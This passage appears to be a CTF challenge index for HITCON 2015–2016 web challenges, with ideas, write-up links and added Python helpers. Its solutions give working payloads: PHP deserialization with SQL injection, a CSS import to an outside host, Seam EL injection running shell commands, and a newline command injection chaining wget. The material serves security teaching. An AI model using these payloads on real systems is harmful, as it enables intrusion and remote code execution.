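Before the two payloads below, an added example of how they are built (this is not the challenge's own code): a PHP `serialize()` emitter in Python that handles the two details the payloads depend on. Property names of private members are mangled to `\0Class\0name` (the page's `%00HITCON%00method`), and every string length is a byte length that counts those NULs and the two bytes of `Ä`. The `extra_count` argument inflates the declared member count, which is the mismatch that made `unserialize()` skip `__wakeup()` in the PHP bug linked above. The class name, member names and visibility are taken from the payloads on this page.

```python
from urllib.parse import quote


class PhpObject:
    """An object to be emitted as PHP `O:len:"Class":count:{...}`.

    visibility selects the property-name mangling PHP uses:
      public    -> name
      protected -> "\\0*\\0name"
      private   -> "\\0Class\\0name"   (what the challenge payload uses)
    extra_count inflates the declared member count; a count that does not match
    the members actually present is the __wakeup() skip from PHP bug #72663.
    """

    def __init__(self, cls, props, visibility='public', extra_count=0):
        self.cls, self.props = cls, props
        self.visibility, self.extra_count = visibility, extra_count

    def mangle(self, name):
        if self.visibility == 'protected':
            return '\0*\0' + name
        if self.visibility == 'private':
            return '\0%s\0%s' % (self.cls, name)
        return name


def php_serialize(value) -> bytes:
    """Serialize Python values into PHP's serialize() format (UTF-8, byte lengths)."""
    if isinstance(value, bool):          # must precede int: bool is an int subclass
        return b'b:%d;' % value
    if isinstance(value, int):
        return b'i:%d;' % value
    if isinstance(value, str):
        value = value.encode('utf-8')
    if isinstance(value, bytes):         # length is the BYTE length, NULs included
        return b's:%d:"%s";' % (len(value), value)
    if isinstance(value, (list, tuple)):
        items = b''.join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return b'a:%d:{%s}' % (len(value), items)
    if isinstance(value, dict):
        items = b''.join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b'a:%d:{%s}' % (len(value), items)
    if isinstance(value, PhpObject):
        body = b''.join(php_serialize(value.mangle(k)) + php_serialize(v)
                        for k, v in value.props.items())
        cls = value.cls.encode('utf-8')
        count = len(value.props) + value.extra_count
        return b'O:%d:"%s":%d:{%s}' % (len(cls), cls, count, body)
    raise TypeError('unsupported type: %r' % type(value))


def as_query_param(payload: bytes, name: str = 'data') -> str:
    """URL-encode for `?data=...`; NUL bytes become %00 as in the requests below."""
    return '%s=%s' % (name, quote(payload, safe=''))


# Constructed payloads mirroring the two requests on this page.
SHOW = PhpObject('HITCON',
                 {'method': 'show', 'args': ["'union select 1,2,password from users#"]},
                 visibility='private', extra_count=1)      # 2 members, declares 3
LOGIN = PhpObject('HITCON',
                  {'method': 'login', 'args': ['orÄnge', 'babytrick1234']},
                  visibility='private')                    # honest count: __wakeup() runs

if __name__ == '__main__':
    print(as_query_param(php_serialize(SHOW)))
    print(as_query_param(php_serialize(LOGIN)))
```

Hand-writing these strings is where payloads usually break: a length that is off by one (PHP counts bytes, not characters) makes `unserialize()` return `false` silently, so generating them is worth the few lines.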
```bash
# get password
curl http://1.2.3.4/
?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}

# get flag
curl http://1.2.3.4/
?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
```
#### Write Ups
* [Hitcon 2016 – Baby Trick](http://0xecute.com/index.php/2016/10/10/baby-trick/)
* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#babytrick)
* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)
## **Angry Boy**
Difficulty: **★★☆**
Solved: **43 / 1024**
Tag: **GrayBox**, **Java**
#### Idea
* `new String(new byte[] {1, -1, 1, -1})` will output `01EFBFBD01EFBFBD`, not `01FF01FF`
* [When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions](https://blog.gdssecurity.com/labs/2015/2/18/when-efbfbd-and-friends-come-knocking-observations-of-byte-a.html)
#### Source Code
* [here](hitcon-ctf-2016/angry%20boy)
#### Solution
* [exploit.py](hitcon-ctf-2016/angry%20boy/exploit.py)
* [decrypt.py](hitcon-ctf-2016/angry%20boy/decrypt.py)
#### Write Ups
* [Angry Boy - Web 300 Problem](https://github.com/pwning/public-writeup/tree/master/hitcon2016/web300-angryboy)
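The observation in the Idea above, reproduced as an added example (not the challenge's exploit): a lossy `byte[] -> String -> byte[]` round trip through a UTF-8 charset replaces every undecodable byte with U+FFFD, so distinct inputs collapse onto the same string. Python's codec with `errors='replace'` is used to stand in for Java's default decoder; the two agree on the page's single-byte case, and only that case is asserted, since Java may split malformed multi-byte sequences differently.

```python
def java_like_roundtrip(raw: bytes) -> bytes:
    """Mimic `new String(bytes)` followed by getBytes() with a UTF-8 default charset:
    undecodable bytes become U+FFFD and come back out as EF BF BD."""
    return raw.decode('utf-8', errors='replace').encode('utf-8')


def distinct_outputs_for_single_bytes() -> int:
    """How many distinct strings the 256 possible single-byte inputs collapse to.
    All 128 bytes >= 0x80 are invalid on their own, so they share one output."""
    return len({java_like_roundtrip(bytes([b])) for b in range(256)})


def collides(a: bytes, b: bytes) -> bool:
    """True when two different byte strings become the same String."""
    return a != b and java_like_roundtrip(a) == java_like_roundtrip(b)


if __name__ == '__main__':
    print(java_like_roundtrip(bytes([1, 255, 1, 255])).hex())   # the page's example
    print(distinct_outputs_for_single_bytes())
```

Anything cryptographic that passes through such a conversion (ciphertext, a MAC, a key) loses most of its entropy in the high half of every byte, which is what makes comparisons or decryption built on these strings attackable.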
## **Angry Seam**
Difficulty: **★★★★**
Solved: **4 / 1024**
Tag: **GrayBox**, **Java**, **Seam Framework**, **CSS RPO**, **EL Injection**, **Java Deserialization**
#### Idea
* CSS Relative Path Overwrite
* Built-in redirection parameter `actionOutcome`
* [RPO Gadgets](http://blog.innerht.ml/rpo-gadgets/)
* [CVE-2010-1871: JBoss Seam Framework remote code execution](http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html)
#### Source Code
* [here](hitcon-ctf-2016/angry%20seam)
#### Solution
**P.s.** I made this challenge because once, when I tried to review the code of the Seam Framework, I found some 0-days and I thought there must be more. So I threw out a brick to attract a jade. And the result was more than I expected :P
**Intended solution**
* Register an account
```
username: `AAAAAA`
password: `AAAAAA`
realname: `{/*';*/}%0a@import'http://orange.tw/?`
```
* Report URL
```
http://1.2.3.4:8080/angryseam/profile.seam?actionOutcome=/profile.seam?username%3dAAAAAA
```
**Unintended solution**
* Register an account
* Update description to
```
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
```
* Login and access
```
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
host: 1.2.3.4
cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
ccc: ls -alh
...
```
**Unintended solution**
* CVE-2013-2165 Java deserialization vulnerability
**Unintended solution**
* SESSION manipulation... seam SUCKS
#### Write Ups
* [Web500 Hitconctf 2016 and exploit CVE-2013-2165](http://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/)
* [Angry Seam (500 pts)](https://github.com/Blaklis/write-ups/tree/master/hitcon)
## **Babyfirst**
Difficulty: **★★**
Solved: **33 / 969**
Tag: **WhiteBox**, **PHP**, **Command Injection**
#### Idea
* Use `NewLine` to bypass regular expression check
* Command injection with alphanumeric characters only
#### Source Code
* [here](hitcon-ctf-2015/babyfirst)
#### Solution
```text
http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0ahttp://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa
```
And there are also lots of creative solutions; see the write-ups below.
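The newline bypass from the Idea above, as an added example (not the challenge source, which this page does not reproduce): the filter is assumed to be a per-argument `/^\w+$/` check. In both PCRE and Python, `$` also matches just before a trailing newline, so `orange\n` is accepted and the newline survives into the joined command line, where the shell treats it as a command separator. The hardened check anchors at the true end of the string (`fullmatch`, or `\Z`; PCRE's `\z` or the `D` modifier). The request decoded below is the page's first URL.

```python
import re


def arg_ok_vulnerable(arg: str) -> bool:
    """Assumed challenge filter: alphanumeric/underscore only, via /^\\w+$/.
    `$` matches before a final newline, so "orange\\n" passes."""
    return re.match(r'^\w+$', arg) is not None


def arg_ok_fixed(arg: str) -> bool:
    """Hardened: the whole string must match; a trailing newline is rejected."""
    return re.fullmatch(r'\w+', arg) is not None


def build_command(args, check) -> str:
    """Join the arguments the way the script does, after checking each one with `check`."""
    for a in args:
        if not check(a):
            raise ValueError('rejected argument: %r' % a)
    return ' '.join(args)


def passes(args, check) -> bool:
    """True if every argument survives `check`."""
    return all(check(a) for a in args)


def lines_executed(cmd: str):
    """What the shell actually runs: the newline-separated commands."""
    return [line.strip() for line in cmd.split('\n') if line.strip()]


# The page's first request, URL-decoded: args[0]=x%0a, args[1]=mkdir, args[2]=orange%0a, ...
ATTACK = ['x\n', 'mkdir', 'orange\n', 'cd', 'orange\n', 'wget', '846465263\n']

if __name__ == '__main__':
    print(lines_executed(build_command(ATTACK, arg_ok_vulnerable)))
    print(passes(ATTACK, arg_ok_fixed))
```

Each argument still looks alphanumeric to the vulnerable check, yet the joined string runs four separate commands, which is how `mkdir`, `cd` and `wget` get chained without a single `;` or `|`.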
#### Write Ups
* [babyfirst (web 100)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web100-babyfirst/writeup.md)
* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)
* [HITCON 2015 Quals: Babyexploit](https://kt.pe/blog/2015/10/hitcon-2015-quals-babyexploit/)
* [Babyfirst (web, 100p, ?? solves)](https://github.com/p4-team/ctf/tree/master/2015-10-18-hitcon/web_100_babyfirst#eng-version)
## **nanana**
Difficulty: **★★★**
Solved: **18 / 969**
Tag: **GrayBox**, **C**, **PWN**
#### Idea
* Pwn without library
* Format String without output
* Bypass Stack Guard by overflowing `ARGV[1]`
#### Source Code
* [here](hitcon-ctf-2015/nanana/)
#### Solution
* [exploit.py](hitcon-ctf-2015/nanana/exploit.py)
#### Write Ups
* [nanana (pwn, web 200)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web200-nanana/writeup.md)
* [HITCON 2015 Quals: Nanana](https://kt.pe/blog/2015/10/hitcon-2015-quals-nanana/)
* [Pwning (sometimes) with style - Dragons’ notes on CTFs](http://j00ru.vexillium.org/blog/24_03_15/dragons_ctf.pdf)
## **Giraffe's Coffee**
Difficulty: **★★★☆**
Solved: **16 / 969**
Tag: **WhiteBox**, **PHP**
#### Idea
* Break PHP PRNG
* Break shared PRNG STATE in Apache Prefork mode
#### Source Code
* [here](hitcon-ctf-2015/giraffe's-coffee)
#### Solution
TBD
#### Write Ups
* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)
* [Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web300-giraffes-coffee/readme.md)
* [HITCON 2015 WEB 300](https://docs.google.com/document/d/1NlCF4jykgwuUMkr0I8HjbLRUKNAGf6jzRiI2D9TyumA/edit)
## **lalala**
Difficulty: **★★★☆**
Solved: **2 / 969**
Tag: **BlackBox**, **PHP**, **SSRF**
#### Idea
* Bypass the SSRF restriction with a 302 redirect
* Exploit the FastCGI protocol through `gopher://`
#### Source Code
* [here](hitcon-ctf-2015/lalala)
#### Solution
```php